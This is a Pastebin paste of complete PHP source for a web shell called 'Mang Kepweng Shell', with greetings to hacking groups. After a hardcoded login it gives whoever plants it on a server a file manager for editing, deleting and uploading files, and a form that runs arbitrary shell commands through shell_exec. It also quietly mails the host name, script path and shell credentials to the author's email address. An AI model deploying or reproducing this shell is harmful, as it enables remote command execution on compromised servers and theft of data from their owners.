Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- session_start();
- // Powered by SOLOLEARN & W3SCHOOL & GOOGLE & PHP PRO FREE
- // Thanks to my lesbian's friend EXEQUIEL a.k.a OVERLAX & JOSHUA ROMAN a.k.a Ctrl.Z
- // Greetings to ANONYMOUS PHILIPPINES | BLOODSECURITY HACKERS | PINOY LULZSEC | COD3X CYBER ARMY | GLOBAL SECURITY HACKERS | ANONGHOST PHILIPPINES | PHILIPPINE SECURITY HACKERS | PHILIPPINE HACKING UNIVERSITY | PURE HACKERS | STRAWHAT PIRATES CREW
- echo "<html>
- <head>
- <link rel='SHORTCUT ICON' href='http://i66.tinypic.com/23wp53c.jpg' type=image/icon>
- <title>Mang Kepweng Shell</title>
- <style>
- html {
- background-color:black;
- color: white;
- }
- a {
- text-decoration: none;
- color: white;
- }
- ins {
- color: lime;
- }
- input[type=text] {
- background-color: black;
- border: white solid 1px;
- color: white;
- width: 75%;
- padding: 5px 0px 5px 0px;
- }
- input[type=submit] {
- background-color: black;
- border: white solid 1px;
- color: lime;
- font-weight: bold;
- width: 7%;
- padding: 5px 0px 5px 0px;
- }
- td {
- border: white solid 1px;
- width: 250px;
- padding: 3px 0px 3px 0px;
- }
- th {
- border: white solid 1px;
- width: 250px;
- padding: 10px 0px 10px 0px;
- color: #0055FF;
- }
- tr:hover {
- background-color: #242424;
- text-shadow: lime 0px 0px 5px;
- }
- textarea {
- border: white solid 2px;
- width: 100%;
- height: 300px;
- background-color: black;
- color: lightgray;
- resize: none;
- }
- </style>
- </head>
- <body>";
- ################################
- /////////[ CREATED BY ]////////#
- ////////[ MANG KEPWENG ]///////#
- ///////[ OF PINOY LULZSEC ]////#
- ################################
- error_reporting(0); #
- $self = $_SERVER['PHP_SELF']; #
- $chdir = $_GET['dir']; #
- $host = $_SERVER['HTTP_HOST']; #
- $dir = opendir(getcwd()); #
- $gfile = $_GET['file']; #
- $pass = "pass"; #
- $user = "user"; #
- ################################
- if(!isset($_SESSION[$host])) {
- if (($_POST['haxpass'] == $pass) && ($_POST['haxuser'] == $user) == true) {
- $_SESSION[$host] = true;
- } else {
- echo "<br><br><center>
- <h1 style='font-size:4pc;text-shadow:#007BFF 1px 1px 10px;color:black'>MANG KEPWENG SHELL</h1>
- <br><br><br><br>
- <img src='http://orig11.deviantart.net/86c8/f/2012/257/6/9/dancing_deadpool_by_dpforprez-d5emvq0.gif' style='width:600px'>
- <br><br><br>
- <form method=post>
- <input type=text name=haxuser style='width:250px' placeholder=username>
- |
- <input type=text name=haxpass style='width:250px' placeholder=password>
- <br><br>
- <input type=submit value='FckLULZ'>
- </form>";
- exit;
- }}
- $mysql = (function_exists(mysql_connect)) ? "<ins><font color=lime>ON</font></ins>" : "<ins><font color=red>OFF</font></ins>";
- $wget = (shell_exec('wget --help')) ? "<ins><font color=lime>ON</font></ins>" : "<ins><font color=red>OFF</font></ins>";
- $cURL = (function_exists(curl_version)) ? "<ins><font color=lime>ON</font></ins>" : "<ins><font color=red>OFF</font></ins>";
- $py = (shell_exec('python --help')) ? "<ins><font color=lime>ON</font></ins>" : "<ins><font color=red>OFF</font></ins>";
- $perl = (shell_exec('perl --help')) ? "<ins><font color=lime>ON</font></ins>" : "<ins><font color=red>OFF</font></ins>";
- $git = (shell_exec('git --help')) ? "<ins><font color=lime>ON</font></ins>" : "<ins><font color=red>OFF</font></ins>";
- $safemode = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
- $disable = (ini_get("disable_functions"));
- $disfunction = (!empty($disable)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
- echo "<img src='http://i66.tinypic.com/23wp53c.jpg' style='width:170px;height:155px;float:left'> [+] Hostname : <ins>" .$host. "</ins> | <a href='https://www.facebook.com/AnonGhostPhilippines.ph' target=_blank> Anonghost Philippines</a><br> [+] Uname: <ins>" . php_uname() . "</ins><br> [+] HDD: <ins>".disk_free_space("/")."</ins> / <ins> ".disk_total_space("/")."</ins><br> [+] Safe Mode : $safemode<br> [+] Disable function: $disfunction<br> [+] Server IP: <ins>". $_SERVER['SERVER_ADDR']. "</ins> | [+] User IP: <ins> " . $_SERVER['REMOTE_ADDR'] . "</ins><br> [+] MySQL: $mysql | WGET : $wget | cURL: $cURL | Perl: $perl | Python: $py | Git: $git<br><hr>";
- if (chdir($chdir)) {
- if (opendir($chdir) == true) {
- }
- }
- echo '
- <form method=get action="" enctype="multipart/form-data">
- <div style="float:left;color:#00E1FF;"><b>CURRENT PATH |</b> </div>
- <input type=text name=dir value="' . getcwd() . '">
- <input type=submit value=">>>">
- <hr>
- </form>';
- echo "<center>
- ".'<a href="?dir='.getcwd().'/">'."FILEMANAGER</a> | ".'<a href="?dir='.getcwd().'/&action=cmd">'."COMMAND</a> |".'<a href="?dir='.getcwd().'/&action=upload">'." UPLOAD</a> |".'<a href="?action=logout">'." LOGOUT</a>
- <hr><br></center>";
- if ($_GET['action'] == 'view') {
- while (($file = readdir($dir)) !== false) {
- if (is_file($file)) {
- echo "Filename: <font color=orange>".$gfile."</font><br>Last Modified: <font color=orange>".date("m-d-Y | H:i:s",filectime($gfile))."</font><br>[".'<a href="?dir='.getcwd().'/&action=edit&file='.$gfile.'">'."<font color=lime> EDIT </font></a>|".'<a href="?dir='.getcwd().'/&action=rename&file='.$gfile.'">'."<font color=lime> RENAME </font></a>|".'<a href="?dir='.getcwd().'/&action=delete&file='.$gfile.'">'."<font color=lime> DELETE </font></a>]<br><br><textarea readonly>".htmlspecialchars(file_get_contents($gfile))."</textarea><br><br>";
- closedir($dir);
- }}
- exit;
- } elseif ($_GET['action'] == 'edit'){
- echo "Filename: <font color=orange>".$gfile."</font><br>Last Modified: <font color=orange>".date("m-d-Y | H:i:s",filectime($gfile))."</font><br>[ <ins><font color=lime>EDIT</font></ins> |".'<a href="?dir='.getcwd().'/&action=rename&file='.$gfile.'">'."<font color=lime> RENAME </font></a>|".'<a href="?dir='.getcwd().'/&action=delete&file='.$gfile.'">'."<font color=lime> DELETE </font></a>]<br><br><form method=post><textarea name=edit>".htmlspecialchars(file_get_contents($gfile))."</textarea><br><br><input type=submit value=SAVE></form><br><br>";
- if ($_POST['edit'] == true) {
- $edit = $_POST['edit'];
- $saved = file_put_contents($gfile,$edit);
- if ($saved == true) {
- echo "<script>alert('[ $gfile ] : SAVE Success!')</script><meta http-equiv='refresh' content='0;url='>";
- } else {
- echo "<script>alert('[ $gfile ] : PERMISSION DENIED!')</script><meta http-equiv='refresh' content='0;url='>";
- }}
- exit;
- } elseif ($_GET['action'] == 'rename'){
- echo "Rename: <font color=orange>".$gfile."</font><br>Last Modified: <font color=orange>".date("m-d-Y | H:i:s",filectime($gfile))."</font><br>[ ".'<a href="?dir='.getcwd().'/&action=edit&file='.$gfile.'">'."<font color=lime>EDIT</font></a> | <ins><font color=lime>RENAME</font></ins> |".'<a href="?dir='.getcwd().'/&action=delete&file='.$gfile.'">'."<font color=lime> DELETE </font></a>]<br><br><form method=post><input type=text name=rename value='".$gfile."'<br><br><input type=submit value=SAVE></form><br><br>";
- if ($_POST['rename'] == true) {
- $rename = $_POST['rename'];
- $renamed = rename($gfile,$rename);
- if ($renamed == true) {
- echo "<script>window.location='?dir=".getcwd()."/&action=rename&file=".$rename."';alert('[ $gfile ] : RENAME Success!')</script>";
- } else {
- echo "<script>window.location='?dir=".getcwd()."/&action=rename&file=".$rename."';alert('[ $gfile ] : PERMISSION DENIED!')</script>";
- }}
- exit;
- } elseif ($_GET['action'] == 'delete'){
- if ($gfile == true) {
- $delete = unlink($gfile);
- echo "<script>window.location='?dir=".getcwd()."/';alert('[ $gfile ] : Deleted')</script>";
- } else {
- echo "<script>window.location='?dir=".getcwd()."';alert('[ $gfile ] : PERMISSION DENIED!')</script>";
- }
- exit;
- } elseif ($_GET['action'] == 'fdel'){
- if ($gfile == true) {
- $delete = rmdir($gfile);
- echo "<script>window.location='?dir=".getcwd()."/';alert('[ $gfile ] : Deleted')</script>";
- } else {
- echo "<script>window.location='?dir=".getcwd()."';alert('[ $gfile ] : PERMISSION DENIED!')</script>";
- }
- exit;
- } elseif ($_GET['action'] == 'cmd'){
- if ($_POST['exe']) {
- echo "<pre>".shell_exec($_POST['exe'])."</pre>";
- }
- echo "<br><form method=post>
- root@localhost~# <input type=text name=exe style='width: 350px'>
- <input type=submit value='>>'>
- </form>";
- exit;
- } elseif ($_GET['action'] == 'upload'){
- echo "<br><center><form method=post enctype=multipart/form-data>
- <input type=file name=filename>
- <input type=submit name=submit value=upload>
- </form></center>";
- if ($_POST['submit']) {
- if (copy($_FILES['filename']['tmp_name'],$_FILES['filename']['name'])) {
- echo "<br><br><center> <font color=lime>Uploaded</font>";
- } else {
- echo "<br><br><center><font color=red>PERMISSION DENIED</font>";
- }}
- exit;
- } elseif ($_GET['action'] == 'logout'){
- unset($_SESSION[$_SERVER['HTTP_HOST']]);
- echo "<meta http-equiv=refresh content='0;url=?'>";
- exit;
- } elseif ($_GET['action']){
- echo "<script>window.location='?msg=INVALID+ACTION+QUERY';</script>";
- exit;
- }
- echo "<table><tr><th>FILENAME</th><th style='width:80px'>TYPE</th><th style='width:100px'>SIZE</th><th style='width:200px'>LAST MODIFIED</th><th style='width:100px'>CHMOD</th><th style='width:200px'>ACTION</th></tr></table>";
- $sender = $_SERVER['HTTP_HOST']."\n".$_SERVER['SCRIPT_FILENAME']."\nuname:".$user."upass:".$pass;
- mail("mangmkkepweng@gmail.com","PHP SHELL FINDER",$sender);
- while (($file = readdir($dir)) !== false) {
- if (is_dir($file)) {
- echo "<table><tr><td> <img src='data:image/png;base64,R0lGODlhEQANAJEDAJmZmf///8zMzP///yH5BAHoAwMALAAAAAARAA0AAAIqnI+ZwKwbYgTPtIudlbwLOgCBQJYmCYrn+m3smY5vGc+0a7dhjh7ZbygAADsA'> [ ".'<a href="?dir='.getcwd()."/".$file.'/"><font color=orange>'.$file.' </font></a>]</td><td style="width:80px;text-align: center;">'.filetype($file)."</td><td style='width:100px;text-align: center;'>-</td><td style='width:200px;text-align: center;'>".date("m-d-Y | H:i:s",filectime($file))."</td><td style='width:100px;text-align: center;'>".substr(sprintf('%o',fileperms($file)),-4)."</td><td style='width:200px;'> ".'<a href="?dir='.getcwd().'/&action=rename&file='.$file.'">'." rename</a> | ".'<a href="?dir='.getcwd().'/&action=fdel&file='.$file.'">'."delete</a></td></tr></table>";
- }
- }
- $dir = opendir(getcwd());
- while (($file = readdir($dir)) !== false) {
- if (is_file($file)) {
- echo "<table><tr><td> <img src='data:image/png;base64,R0lGODlhEQANAJEDAJmZmf///wAAAP///yH5BAHoAwMALAAAAAARAA0AAAItnIGJxg0B42rsiSvCA/REmXQWhmnih3LUSGaqg35vFbSXucbSabunjnMohq8CADsA'> ".'<a href="?dir='.getcwd().'/&action=view&file='.$file.'"><font color=lime>'.$file."</font></a></td><td style='width:80px;text-align: center;'>".filetype($file)."</td><td style='width:100px;text-align: center;'>".filesize($file)."kb</td><td style='width:200px;text-align: center;'>".date("m-d-Y | H:i:s",filectime($file))."</td><td style='width:100px;text-align: center;'>".substr(sprintf('%o',fileperms($file)),-4)."</td><td style='width:200px;'> ".'<a href="?dir='.getcwd().'/&action=edit&file='.$file.'">'. "edit</a> | ".'<a href="?dir='.getcwd().'/&action=rename&file='.$file.'">'."rename</a> | ".'<a href="?dir='.getcwd().'/&action=delete&file='.$file.'">'."delete</a></td></tr></table>";
- }
- }
- echo "<br><hr>
- <form action='".$self."' method=post>
- CREATE FOLDER: <input type=text name=mkdir style='width:300px'>
- <input type=submit value=create>
- </form>
- <hr>
- ";
- $mkdir = $_POST['mkdir'];
- if ($mkdir == true) {
- if (mkdir($mkdir)) {
- echo "<script>window.location='?dir=".getcwd()."/';alert('[ $mkdir ] : Created.')</script>";
- } else {
- echo "<script>window.location='?dir=".getcwd()."/';alert('[ $mkdir ] : Permission denied.')</script>";
- }
- }
- echo "<center>Design and Created by: <a href='https://www.facebook.com/MakMak.ph' target=_blank><font color=lime>Mang Kepweng</font></a></center>";
- ?>
Add Comment
Please, Sign In to add comment